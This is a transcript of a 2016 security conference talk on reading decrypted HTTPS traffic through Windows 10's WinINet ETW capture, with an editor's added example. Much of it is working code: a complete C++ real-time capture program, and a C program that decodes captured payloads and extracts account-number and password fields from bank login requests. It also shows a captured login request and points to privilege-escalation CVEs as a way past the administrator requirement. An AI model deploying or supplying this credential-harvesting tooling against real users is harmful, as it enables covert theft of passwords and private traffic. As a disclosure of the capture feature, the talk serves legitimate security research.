Intercept HTTPS Traffic on Windows 10

AVTOKYO 2016, Oct. 22nd 2016

Transcript of Intercept HTTPS Traffic on Windows 10

Page 1: Intercept HTTPS Traffic on Windows 10

INTERCEPT HTTPS TRAFFIC ON WINDOWS 10
AVTOKYO 2016, Oct. 22nd 2016

Page 2: Intercept HTTPS Traffic on Windows 10

ABOUT ME

• Soya Aoyama (AO)
• Security researcher who LOVES FRONTALE and DRINK
• Working at Fujitsu System Integration Laboratories Ltd. (since 2014)
• https://www.facebook.com/soya.aoyama.3

Page 3: Intercept HTTPS Traffic on Windows 10

INTRODUCTION

These slides include some fiction and are partially unrelated to actual persons, entities, etc.

Page 4: Intercept HTTPS Traffic on Windows 10

CONVERSATION BETWEEN THE TWO (1)

Hi Bill, I heard that a great function was added to Windows 10, correct?
Well, yes, Tim. The function to expose attackers' behaviors.
Wow. What's the function in particular?
Capture the full WinINet traffic. It can be checked through Event Viewer.

Page 5: Intercept HTTPS Traffic on Windows 10

HOW TO CHECK

1. Open Event Viewer and select "Applications and Services Logs" > "Microsoft" > "Windows" > "WinINet (Microsoft-Windows-WinINet-Capture)" > "Capture/Analytic"
2. Click "Enable Log" to enable the log
3. Start Edge and access web services

Page 6: Intercept HTTPS Traffic on Windows 10

THE RESULT

Details of Event Viewer

Page 7: Intercept HTTPS Traffic on Windows 10

CONVERSATION BETWEEN THE TWO (2)

Where are the captured data stored?
It's in the Payload in the Details.
It's like cipher text and incomprehensible, isn't it?
A-a-I c-c-can read it by eye.

Page 8: Intercept HTTPS Traffic on Windows 10

STRING CONVERSION

1. Copy the contents of Payload
2. Paste into http://singoro.net/16henkan/ (a hex-to-text converter)

The converted Payload is a plain HTTP response:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/8.5
S: CH1APPEX09466
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: POST, GET, OPTIONS, HEAD
Access-Control-Max-Age: 21600
Date: Thu, 08 Sep 2016 05:42:18 GMT
Content-Length: 0

Page 9: Intercept HTTPS Traffic on Windows 10

CONVERSATION BETWEEN THE TWO (3)

It seems really captured... but no time to convert per packet, right?
No worries. It's designed to be captured from applications.
Well done, Bill. You never miss a trick. How do you realize it?
I use Event Tracing for Windows (ETW).

Page 10: Intercept HTTPS Traffic on Windows 10

SOURCE PROGRAM

Application to capture WinINet contents in real time. The slide shows the program up to the session setup in the consumer thread; the remainder (OpenTrace/ProcessTrace and the controller in main) is completed here with the standard ETW calls so the listing builds and runs as one program. It must be run as administrator, since starting a trace session requires that privilege.

```cpp
// Application to capture WinINet contents in real time.
#ifndef UNICODE
#define UNICODE   // Visual Studio projects define this by default; needed for the wide-string ETW APIs
#endif
#include <Windows.h>
#include <Evntrace.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>
#include <tdh.h>
#pragma comment(lib, "advapi32.lib")

TRACEHANDLE controllerHandle = INVALID_PROCESSTRACE_HANDLE;
LPWSTR sessionName = L"Microsoft-Windows-WinInet-Capture";
HANDLE event = NULL;

EXTERN_C __declspec(selectany) const GUID PROVIDERID_Microsoft_Windows_WinInet_Capture =
    { 0xa70ff94f, 0x570b, 0x4979, { 0xba, 0x5c, 0xe5, 0x9c, 0x9f, 0xea, 0xb6, 0x1b } };

// Event callback: the first 0x10 bytes of the payload are header fields,
// the rest is the raw HTTP data, printed as text
void WINAPI EventRecordCallback(PEVENT_RECORD EventRecord) {
    if (TRUE == IsEqualGUID(PROVIDERID_Microsoft_Windows_WinInet_Capture, EventRecord->EventHeader.ProviderId)) {
        if (EventRecord->UserDataLength <= 0x10) return;  // header only, nothing to print
        char *UserData = (char *)malloc(EventRecord->UserDataLength + 1);  // +1 keeps a terminating NUL for printf
        if (UserData == NULL) return;
        memset(UserData, 0, EventRecord->UserDataLength + 1);
        memcpy(UserData, (PBYTE)EventRecord->UserData + 0x10, EventRecord->UserDataLength - 0x10);
        printf("%s\n", UserData);
        free(UserData);
    }
}

// Consumer thread
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    // Open session
    EVENT_TRACE_LOGFILE logFile = {};
    logFile.LogFileName = NULL;
    logFile.LoggerName = sessionName;
    logFile.ProcessTraceMode = PROCESS_TRACE_MODE_EVENT_RECORD | PROCESS_TRACE_MODE_REAL_TIME;
    logFile.EventRecordCallback = &EventRecordCallback;
    // The slide ends here; the rest is completed with the standard ETW consumer/controller calls.
    TRACEHANDLE consumerHandle = OpenTrace(&logFile);
    if (consumerHandle == INVALID_PROCESSTRACE_HANDLE) return 1;
    ProcessTrace(&consumerHandle, 1, NULL, NULL);  // delivers events to the callback until the session stops
    CloseTrace(consumerHandle);
    return 0;
}

// Controller: start a real-time session, enable the provider on it, stop on Enter
int main() {
    ULONG size = sizeof(EVENT_TRACE_PROPERTIES) + (ULONG)(wcslen(sessionName) + 1) * sizeof(WCHAR);
    EVENT_TRACE_PROPERTIES *props = (EVENT_TRACE_PROPERTIES *)calloc(1, size);
    props->Wnode.BufferSize = size;
    props->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
    props->LogFileMode = EVENT_TRACE_REAL_TIME_MODE;
    props->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
    ULONG status = StartTrace(&controllerHandle, sessionName, props);
    if (status != ERROR_SUCCESS) {
        printf("StartTrace failed: %lu (administrator privileges are required)\n", status);
        return 1;
    }
    EnableTraceEx2(controllerHandle, &PROVIDERID_Microsoft_Windows_WinInet_Capture,
                   EVENT_CONTROL_CODE_ENABLE_PROVIDER, TRACE_LEVEL_VERBOSE, 0, 0, 0, NULL);
    HANDLE thread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
    getchar();
    ControlTrace(controllerHandle, sessionName, props, EVENT_TRACE_CONTROL_STOP);  // makes ProcessTrace return
    WaitForSingleObject(thread, INFINITE);
    CloseHandle(thread);
    free(props);
    return 0;
}
```

Page 11: Intercept HTTPS Traffic on Windows 10

EVENT TRACING FOR WINDOWS

Microsoft blog: https://blogs.msdn.microsoft.com/jpwdkblog/2011/12/27/event-tracing-for-windows-etw/
Aetos382's blog: http://tech.blog.aerie.jp/archive/category/ETW

Page 12: Intercept HTTPS Traffic on Windows 10

CONVERSATION BETWEEN THE TWO (4)

O-o-only requires this much code...
Super EASY, isn't it?
I know you apply this to all PCs inside, huh?
What?

Page 13: Intercept HTTPS Traffic on Windows 10

USERS WHO DON’T KNOW ANYTHING


Access an internet banking site

Page 14: Intercept HTTPS Traffic on Windows 10

THE RESULT

_PAGEID=AA011&_SENDTS=1467876489534&_TRANID=AA011_001&_SUBINDEX=-1&_TARGET=MUFGpop_syokai&_FRAMID=&_LUID=LUID&_WINID=root&_TARGETWINID=&DEVICEPRINT=version%253D3%252E4%252E1%252E0%255F1%2526pm%255Ffpua%253Dmozilla%252F5%252E0%2520%2528windows%2520nt%252010%252E0%2529%2520applewebkit%252F537%252E36%2520%2528khtml%252C%2520like%2520gecko%2529%2520chrome%252F46%252E0%252E2486%252E0%2520safari%252F537%252E36%2520edge%252F13%252E10586%257C5%252E0%2520%2528Windows%2520NT%252010%252E0%2529%2520AppleWebKit%252F537%252E36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%252F46%252E0%252E2486%252E0%2520Safari%252F537%252E36%2520Edge%252F13%252E10586%257CWin32%2526pm%255Ffpsc%253D24%257C1729%257C864%257C824%2526pm%255Ffpsw%253D%2526pm%255Ffptz%253D9%2526pm%255Ffpln%253Dlang%253Dja%252DJP%257Csyslang%253D%257Cuserlang%253D%2526pm%255Ffpjv%253D1%2526pm%255Ffpco%253D1%2526pm%255Ffpasw%253Dflash%257C%2526pm%255Ffpan%253DNetscape%2526pm%255Ffpacn%253DMozilla%2526pm%255Ffpol%253Dtrue%2526pm%255Ffposp%253D%2526pm%255Ffpup%253D%2526pm%255Ffpsaw%253D1729%2526pm%255Ffpspd%253D24%2526pm%255Ffpsbd%253D0%2526pm%255Ffpsdx%253D96%2526pm%255Ffpsdy%253D96%2526pm%255Ffpslx%253D96%2526pm%255Ffpsly%253D96%2526pm%255Ffpsfse%253Dtrue%2526pm%255Ffpsui%253D%2526pm%255Fos%253DWindows%2526pm%255Fbrmjv%253D46%2526pm%255Fbr%253DChrome%2526pm%255Finpt%253D%2526pm%255Fexpt%253D&KEIYAKU_NO=12345678&PASSWORD=87654321

HTTP/1.1 200 OK

Date: Thu, 07 Jul 2016 07:28:47 GMT

Server: Apache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Cache-Control: no-cache

Pragma: no-cache

Content-length: 11661

Content-Type: text/html;charset=Shift_JIS

Connection: close

Extracted from the request body:
KEIYAKU_NO=12345678
PASSWORD=87654321
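Added example, not code from the slides: a C program that performs the string conversion of Page 8 (hex Payload text as copied from the Event Viewer Details pane, decoded to bytes) and then does what the Page 14 result shows, pulling KEIYAKU_NO and PASSWORD out of the captured POST body. It assumes the Payload is hex text and that its first 0x10 bytes are header fields, the same offset the ETW callback on Page 10 skips. The login request, the host bank.example and the field values are constructed for this example, not captured data.

```c
/* Added example (not from the slides): decode a WinINet-Capture Payload as
 * copied from Event Viewer and extract fields from the HTTP body it carries.
 * Assumption: the Payload is hex text whose first 0x10 bytes are header
 * fields (the same offset the slides' ETW callback skips). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_HEADER_LEN 0x10

/* One hex digit to its value, or -1 for any other character. */
static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Hex text -> bytes. Whitespace (as pasted from Event Viewer) is skipped.
 * Returns the byte count, or -1 on a non-hex character, odd digit count or overflow. */
long hex_decode(const char *hex, unsigned char *out, size_t cap) {
    size_t n = 0;
    int hi = -1;
    for (; *hex; hex++) {
        int v = hexval((unsigned char)*hex);
        if (v < 0) { if (isspace((unsigned char)*hex)) continue; return -1; }
        if (hi < 0) { hi = v; continue; }
        if (n >= cap) return -1;
        out[n++] = (unsigned char)((hi << 4) | v);
        hi = -1;
    }
    return hi < 0 ? (long)n : -1;
}

/* Percent-decode a form value in place ('+' becomes a space). Returns the new length. */
size_t url_decode(char *s) {
    char *r = s, *w = s;
    for (; *r; r++) {
        if (*r == '+') { *w++ = ' '; }
        else if (*r == '%' && hexval((unsigned char)r[1]) >= 0 && hexval((unsigned char)r[2]) >= 0) {
            *w++ = (char)((hexval((unsigned char)r[1]) << 4) | hexval((unsigned char)r[2]));
            r += 2;
        } else { *w++ = *r; }
    }
    *w = '\0';
    return (size_t)(w - s);
}

/* Look up `name` in an application/x-www-form-urlencoded body.
 * Copies the decoded value into out; returns 1 if found, 0 otherwise. */
int form_get(const char *body, const char *name, char *out, size_t cap) {
    size_t nlen = strlen(name);
    const char *p = body;
    while (p && *p) {
        const char *end = strchr(p, '&');
        size_t plen = end ? (size_t)(end - p) : strlen(p);
        if (plen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            size_t vlen = plen - nlen - 1;
            if (vlen >= cap) return 0;
            memcpy(out, p + nlen + 1, vlen);
            out[vlen] = '\0';
            url_decode(out);
            return 1;
        }
        p = end ? end + 1 : NULL;
    }
    return 0;
}

/* Decode a Payload hex string, skip the header, and extract one field from the
 * HTTP body (what follows the first blank line; a payload that is a bare request
 * body with no headers is treated as body in full). */
int payload_form_get(const char *payload_hex, const char *name, char *out, size_t cap) {
    unsigned char raw[4096];
    long n = hex_decode(payload_hex, raw, sizeof raw - 1);
    if (n <= PAYLOAD_HEADER_LEN) return 0;  /* malformed, or header with no data */
    raw[n] = '\0';
    const char *text = (const char *)raw + PAYLOAD_HEADER_LEN;
    const char *body = strstr(text, "\r\n\r\n");
    body = body ? body + 4 : text;
    return form_get(body, name, out, cap);
}

/* Constructed sample: 0x10 header bytes followed by a login POST, hex-encoded the
 * way Event Viewer shows the Payload field. Not captured data; values are dummies. */
const char *sample_payload_hex(void) {
    static char hex[2048];
    static const unsigned char header[PAYLOAD_HEADER_LEN] = {0};  /* header contents are not parsed */
    static const char request[] =
        "POST /login HTTP/1.1\r\n"
        "Host: bank.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "_PAGEID=AA011&KEIYAKU_NO=12345678&PASSWORD=p%40ss+word";
    size_t k = 0;
    for (size_t i = 0; i < sizeof header; i++) k += (size_t)sprintf(hex + k, "%02X", header[i]);
    for (size_t i = 0; i < sizeof request - 1; i++) k += (size_t)sprintf(hex + k, "%02X", (unsigned char)request[i]);
    return hex;
}

/* Convenience for the sample: the decoded value of `name`, or "" if absent. */
const char *sample_field(const char *name) {
    static char value[128];
    if (!payload_form_get(sample_payload_hex(), name, value, sizeof value)) value[0] = '\0';
    return value;
}

int main(void) {
    const char *fields[] = {"KEIYAKU_NO", "PASSWORD"};
    for (size_t i = 0; i < 2; i++) printf("%s=%s\n", fields[i], sample_field(fields[i]));
    return 0;
}
```

Paste the Payload text from the Details pane into a string and call payload_form_get on it for the fields of interest; percent-encoded values, like the DEVICEPRINT parameter in the captured request above, come back decoded.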

Page 15: Intercept HTTPS Traffic on Windows 10

CONVERSATION BETWEEN THE TWO (5)

Amazing. No encryption or anything...
Yeah. Even internal fraud monitoring can be done.
What about security? No risk of being abused by attackers?
No worries!! Data capture is impossible without administrative privileges.

Page 16: Intercept HTTPS Traffic on Windows 10

CONCLUSION

Vulnerabilities that allow privilege elevation... are found even this year!!
CVE-2016-0099, CVE-2016-3371

Insanely Great!!